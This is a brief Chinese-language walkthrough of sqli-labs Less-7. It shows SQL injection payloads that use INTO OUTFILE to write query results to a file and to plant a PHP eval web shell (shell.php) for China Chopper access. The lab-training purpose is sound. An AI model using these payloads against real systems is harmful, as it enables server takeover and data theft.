0x0 SQL注入基本姿势

outfile()
outfile函数可以将查询到的数据存放到一个指定文件种,可以利用这个函数写入一句话木马,或者将查询结果写入文件,可以多行输出

0x1 LESS-7

存在注入点 成功闭合
?id=1')) --+
只存在3列
?id=1')) order by 4 --+
利用outfile
?id=1')) union select 1,2,3 into outfile "C:/phpstudy/WWW/sqli-labs/Less-7/1.txt" --+
写入一句话
?id=1')) union select 1,2,"<?php @eval($_POST['123']);?>" into outfile "C:/phpstudy/WWW/sqli-labs/Less-7/shell.php" --+ 菜刀连接

查询结果写入文件
?id=1')) union select version(),database(),user() into outfile "C:/phpstudy/WWW/sqli-labs/Less-7/2.txt" --+
之后操作和之前的关卡一样